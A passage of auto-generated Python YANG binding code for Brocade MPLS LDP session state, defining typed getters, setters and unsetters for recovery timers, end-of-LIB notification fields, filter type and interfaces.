self.__recovery_time_in_use = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="recovery-time-in-use", rest_name="recovery-time-in-use", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
def _get_recovery_time_remaining(self):
"""
Getter method for recovery_time_remaining, mapped from YANG variable /mpls_state/ldp/ldp_session/recovery_time_remaining (uint32)
"""
return self.__recovery_time_remaining
def _set_recovery_time_remaining(self, v, load=False):
"""
Setter method for recovery_time_remaining, mapped from YANG variable /mpls_state/ldp/ldp_session/recovery_time_remaining (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_recovery_time_remaining is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_recovery_time_remaining() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="recovery-time-remaining", rest_name="recovery-time-remaining", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """recovery_time_remaining must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="recovery-time-remaining", rest_name="recovery-time-remaining", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)""",
})
self.__recovery_time_remaining = t
if hasattr(self, '_set'):
self._set()
def _unset_recovery_time_remaining(self):
self.__recovery_time_remaining = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="recovery-time-remaining", rest_name="recovery-time-remaining", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
def _get_gr_state(self):
"""
Getter method for gr_state, mapped from YANG variable /mpls_state/ldp/ldp_session/gr_state (string)
YANG Description: grState
"""
return self.__gr_state
def _set_gr_state(self, v, load=False):
"""
Setter method for gr_state, mapped from YANG variable /mpls_state/ldp/ldp_session/gr_state (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_gr_state is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_gr_state() directly.
YANG Description: grState
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unicode, is_leaf=True, yang_name="gr-state", rest_name="gr-state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """gr_state must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=unicode, is_leaf=True, yang_name="gr-state", rest_name="gr-state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)""",
})
self.__gr_state = t
if hasattr(self, '_set'):
self._set()
def _unset_gr_state(self):
self.__gr_state = YANGDynClass(base=unicode, is_leaf=True, yang_name="gr-state", rest_name="gr-state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
def _get_local_eol_unrecognized_notification(self):
"""
Getter method for local_eol_unrecognized_notification, mapped from YANG variable /mpls_state/ldp/ldp_session/local_eol_unrecognized_notification (boolean)
YANG Description: localEolUnrecognizedNotification
"""
return self.__local_eol_unrecognized_notification
def _set_local_eol_unrecognized_notification(self, v, load=False):
"""
Setter method for local_eol_unrecognized_notification, mapped from YANG variable /mpls_state/ldp/ldp_session/local_eol_unrecognized_notification (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_local_eol_unrecognized_notification is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_local_eol_unrecognized_notification() directly.
YANG Description: localEolUnrecognizedNotification
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="local-eol-unrecognized-notification", rest_name="local-eol-unrecognized-notification", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """local_eol_unrecognized_notification must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="local-eol-unrecognized-notification", rest_name="local-eol-unrecognized-notification", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)""",
})
self.__local_eol_unrecognized_notification = t
if hasattr(self, '_set'):
self._set()
def _unset_local_eol_unrecognized_notification(self):
self.__local_eol_unrecognized_notification = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="local-eol-unrecognized-notification", rest_name="local-eol-unrecognized-notification", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
def _get_remote_eol_unrecognized_notification(self):
"""
Getter method for remote_eol_unrecognized_notification, mapped from YANG variable /mpls_state/ldp/ldp_session/remote_eol_unrecognized_notification (boolean)
YANG Description: remoteEolUnrecognizedNotification
"""
return self.__remote_eol_unrecognized_notification
def _set_remote_eol_unrecognized_notification(self, v, load=False):
"""
Setter method for remote_eol_unrecognized_notification, mapped from YANG variable /mpls_state/ldp/ldp_session/remote_eol_unrecognized_notification (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_remote_eol_unrecognized_notification is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_remote_eol_unrecognized_notification() directly.
YANG Description: remoteEolUnrecognizedNotification
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="remote-eol-unrecognized-notification", rest_name="remote-eol-unrecognized-notification", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """remote_eol_unrecognized_notification must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="remote-eol-unrecognized-notification", rest_name="remote-eol-unrecognized-notification", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)""",
})
self.__remote_eol_unrecognized_notification = t
if hasattr(self, '_set'):
self._set()
def _unset_remote_eol_unrecognized_notification(self):
self.__remote_eol_unrecognized_notification = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="remote-eol-unrecognized-notification", rest_name="remote-eol-unrecognized-notification", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
def _get_does_session_support_eol(self):
"""
Getter method for does_session_support_eol, mapped from YANG variable /mpls_state/ldp/ldp_session/does_session_support_eol (boolean)
YANG Description: doesSessionSupportEol
"""
return self.__does_session_support_eol
def _set_does_session_support_eol(self, v, load=False):
"""
Setter method for does_session_support_eol, mapped from YANG variable /mpls_state/ldp/ldp_session/does_session_support_eol (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_does_session_support_eol is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_does_session_support_eol() directly.
YANG Description: doesSessionSupportEol
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="does-session-support-eol", rest_name="does-session-support-eol", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """does_session_support_eol must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="does-session-support-eol", rest_name="does-session-support-eol", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)""",
})
self.__does_session_support_eol = t
if hasattr(self, '_set'):
self._set()
def _unset_does_session_support_eol(self):
self.__does_session_support_eol = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="does-session-support-eol", rest_name="does-session-support-eol", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
def _get_local_state(self):
"""
Getter method for local_state, mapped from YANG variable /mpls_state/ldp/ldp_session/local_state (boolean)
YANG Description: localState
"""
return self.__local_state
def _set_local_state(self, v, load=False):
"""
Setter method for local_state, mapped from YANG variable /mpls_state/ldp/ldp_session/local_state (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_local_state is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_local_state() directly.
YANG Description: localState
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="local-state", rest_name="local-state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """local_state must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="local-state", rest_name="local-state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)""",
})
self.__local_state = t
if hasattr(self, '_set'):
self._set()
def _unset_local_state(self):
self.__local_state = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="local-state", rest_name="local-state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
def _get_remote_state(self):
"""
Getter method for remote_state, mapped from YANG variable /mpls_state/ldp/ldp_session/remote_state (boolean)
YANG Description: remoteState
"""
return self.__remote_state
def _set_remote_state(self, v, load=False):
"""
Setter method for remote_state, mapped from YANG variable /mpls_state/ldp/ldp_session/remote_state (boolean)
If this variable is read-only (config: false) in the
source YANG file, then _set_remote_state is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_remote_state() directly.
YANG Description: remoteState
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="remote-state", rest_name="remote-state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """remote_state must be of a type compatible with boolean""",
'defined-type': "boolean",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="remote-state", rest_name="remote-state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)""",
})
self.__remote_state = t
if hasattr(self, '_set'):
self._set()
def _unset_remote_state(self):
self.__remote_state = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="remote-state", rest_name="remote-state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='boolean', is_config=False)
def _get_eol_notification_time(self):
"""
Getter method for eol_notification_time, mapped from YANG variable /mpls_state/ldp/ldp_session/eol_notification_time (uint32)
YANG Description: eolNotificationTime
"""
return self.__eol_notification_time
def _set_eol_notification_time(self, v, load=False):
"""
Setter method for eol_notification_time, mapped from YANG variable /mpls_state/ldp/ldp_session/eol_notification_time (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_eol_notification_time is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_eol_notification_time() directly.
YANG Description: eolNotificationTime
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="eol-notification-time", rest_name="eol-notification-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """eol_notification_time must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="eol-notification-time", rest_name="eol-notification-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)""",
})
self.__eol_notification_time = t
if hasattr(self, '_set'):
self._set()
def _unset_eol_notification_time(self):
self.__eol_notification_time = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="eol-notification-time", rest_name="eol-notification-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
def _get_eol_notification_time_remaining(self):
"""
Getter method for eol_notification_time_remaining, mapped from YANG variable /mpls_state/ldp/ldp_session/eol_notification_time_remaining (uint32)
YANG Description: eolNotificationTimeRemaining
"""
return self.__eol_notification_time_remaining
def _set_eol_notification_time_remaining(self, v, load=False):
"""
Setter method for eol_notification_time_remaining, mapped from YANG variable /mpls_state/ldp/ldp_session/eol_notification_time_remaining (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_eol_notification_time_remaining is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_eol_notification_time_remaining() directly.
YANG Description: eolNotificationTimeRemaining
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="eol-notification-time-remaining", rest_name="eol-notification-time-remaining", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """eol_notification_time_remaining must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="eol-notification-time-remaining", rest_name="eol-notification-time-remaining", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)""",
})
self.__eol_notification_time_remaining = t
if hasattr(self, '_set'):
self._set()
def _unset_eol_notification_time_remaining(self):
self.__eol_notification_time_remaining = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="eol-notification-time-remaining", rest_name="eol-notification-time-remaining", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
def _get_eol_tx_label_silence_time(self):
"""
Getter method for eol_tx_label_silence_time, mapped from YANG variable /mpls_state/ldp/ldp_session/eol_tx_label_silence_time (uint32)
YANG Description: eolTxLabelSilenceTime
"""
return self.__eol_tx_label_silence_time
def _set_eol_tx_label_silence_time(self, v, load=False):
"""
Setter method for eol_tx_label_silence_time, mapped from YANG variable /mpls_state/ldp/ldp_session/eol_tx_label_silence_time (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_eol_tx_label_silence_time is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_eol_tx_label_silence_time() directly.
YANG Description: eolTxLabelSilenceTime
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="eol-tx-label-silence-time", rest_name="eol-tx-label-silence-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """eol_tx_label_silence_time must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="eol-tx-label-silence-time", rest_name="eol-tx-label-silence-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)""",
})
self.__eol_tx_label_silence_time = t
if hasattr(self, '_set'):
self._set()
def _unset_eol_tx_label_silence_time(self):
self.__eol_tx_label_silence_time = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="eol-tx-label-silence-time", rest_name="eol-tx-label-silence-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
def _get_eol_tx_label_silence_time_remaining(self):
"""
Getter method for eol_tx_label_silence_time_remaining, mapped from YANG variable /mpls_state/ldp/ldp_session/eol_tx_label_silence_time_remaining (uint32)
YANG Description: eolTxLabelSilenceTimeRunning
"""
return self.__eol_tx_label_silence_time_remaining
def _set_eol_tx_label_silence_time_remaining(self, v, load=False):
"""
Setter method for eol_tx_label_silence_time_remaining, mapped from YANG variable /mpls_state/ldp/ldp_session/eol_tx_label_silence_time_remaining (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_eol_tx_label_silence_time_remaining is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_eol_tx_label_silence_time_remaining() directly.
YANG Description: eolTxLabelSilenceTimeRunning
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="eol-tx-label-silence-time-remaining", rest_name="eol-tx-label-silence-time-remaining", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """eol_tx_label_silence_time_remaining must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="eol-tx-label-silence-time-remaining", rest_name="eol-tx-label-silence-time-remaining", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)""",
})
self.__eol_tx_label_silence_time_remaining = t
if hasattr(self, '_set'):
self._set()
def _unset_eol_tx_label_silence_time_remaining(self):
self.__eol_tx_label_silence_time_remaining = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="eol-tx-label-silence-time-remaining", rest_name="eol-tx-label-silence-time-remaining", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
def _get_eol_rx_label_silence_time(self):
"""
Getter method for eol_rx_label_silence_time, mapped from YANG variable /mpls_state/ldp/ldp_session/eol_rx_label_silence_time (uint32)
YANG Description: eolRxLabelSilenceTime
"""
return self.__eol_rx_label_silence_time
def _set_eol_rx_label_silence_time(self, v, load=False):
"""
Setter method for eol_rx_label_silence_time, mapped from YANG variable /mpls_state/ldp/ldp_session/eol_rx_label_silence_time (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_eol_rx_label_silence_time is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_eol_rx_label_silence_time() directly.
YANG Description: eolRxLabelSilenceTime
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="eol-rx-label-silence-time", rest_name="eol-rx-label-silence-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """eol_rx_label_silence_time must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="eol-rx-label-silence-time", rest_name="eol-rx-label-silence-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)""",
})
self.__eol_rx_label_silence_time = t
if hasattr(self, '_set'):
self._set()
def _unset_eol_rx_label_silence_time(self):
self.__eol_rx_label_silence_time = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="eol-rx-label-silence-time", rest_name="eol-rx-label-silence-time", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
def _get_eol_rx_label_silence_time_remaining(self):
"""
Getter method for eol_rx_label_silence_time_remaining, mapped from YANG variable /mpls_state/ldp/ldp_session/eol_rx_label_silence_time_remaining (uint32)
YANG Description: eolRxLabelSilenceTimeRunning
"""
return self.__eol_rx_label_silence_time_remaining
def _set_eol_rx_label_silence_time_remaining(self, v, load=False):
"""
Setter method for eol_rx_label_silence_time_remaining, mapped from YANG variable /mpls_state/ldp/ldp_session/eol_rx_label_silence_time_remaining (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_eol_rx_label_silence_time_remaining is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_eol_rx_label_silence_time_remaining() directly.
YANG Description: eolRxLabelSilenceTimeRunning
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="eol-rx-label-silence-time-remaining", rest_name="eol-rx-label-silence-time-remaining", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """eol_rx_label_silence_time_remaining must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="eol-rx-label-silence-time-remaining", rest_name="eol-rx-label-silence-time-remaining", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)""",
})
self.__eol_rx_label_silence_time_remaining = t
if hasattr(self, '_set'):
self._set()
def _unset_eol_rx_label_silence_time_remaining(self):
self.__eol_rx_label_silence_time_remaining = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="eol-rx-label-silence-time-remaining", rest_name="eol-rx-label-silence-time-remaining", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='uint32', is_config=False)
def _get_filtered(self):
"""
Getter method for filtered, mapped from YANG variable /mpls_state/ldp/ldp_session/filtered (session-filter-type)
YANG Description: Filter Type
"""
return self.__filtered
def _set_filtered(self, v, load=False):
"""
Setter method for filtered, mapped from YANG variable /mpls_state/ldp/ldp_session/filtered (session-filter-type)
If this variable is read-only (config: false) in the
source YANG file, then _set_filtered is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_filtered() directly.
YANG Description: Filter Type
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'sess-filtered-out': {'value': 3}, u'sess-filtered-in': {'value': 2}, u'sess-filtered': {'value': 1}},), is_leaf=True, yang_name="filtered", rest_name="filtered", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='session-filter-type', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """filtered must be of a type compatible with session-filter-type""",
'defined-type': "brocade-mpls-operational:session-filter-type",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'sess-filtered-out': {'value': 3}, u'sess-filtered-in': {'value': 2}, u'sess-filtered': {'value': 1}},), is_leaf=True, yang_name="filtered", rest_name="filtered", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='session-filter-type', is_config=False)""",
})
self.__filtered = t
if hasattr(self, '_set'):
self._set()
def _unset_filtered(self):
self.__filtered = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'sess-filtered-out': {'value': 3}, u'sess-filtered-in': {'value': 2}, u'sess-filtered': {'value': 1}},), is_leaf=True, yang_name="filtered", rest_name="filtered", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='session-filter-type', is_config=False)
def _get_interfaces(self):
"""
Getter method for interfaces, mapped from YANG variable /mpls_state/ldp/ldp_session/interfaces (string)
YANG Description: interface list
"""
return self.__interfaces
def _set_interfaces(self, v, load=False):
"""
Setter method for interfaces, mapped from YANG variable /mpls_state/ldp/ldp_session/interfaces (string)
If this variable is read-only (config: false) in the
source YANG file, then _set_interfaces is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_interfaces() directly.
YANG Description: interface list
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=TypedListType(allowed_type=unicode), is_leaf=False, yang_name="interfaces", rest_name="interfaces", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """interfaces must be of a type compatible with string""",
'defined-type': "string",
'generated-type': """YANGDynClass(base=TypedListType(allowed_type=unicode), is_leaf=False, yang_name="interfaces", rest_name="interfaces", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)""",
})
self.__interfaces = t
if hasattr(self, '_set'):
self._set()
def _unset_interfaces(self):
self.__interfaces = YANGDynClass(base=TypedListType(allowed_type=unicode), is_leaf=False, yang_name="interfaces", rest_name="interfaces", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='string', is_config=False)
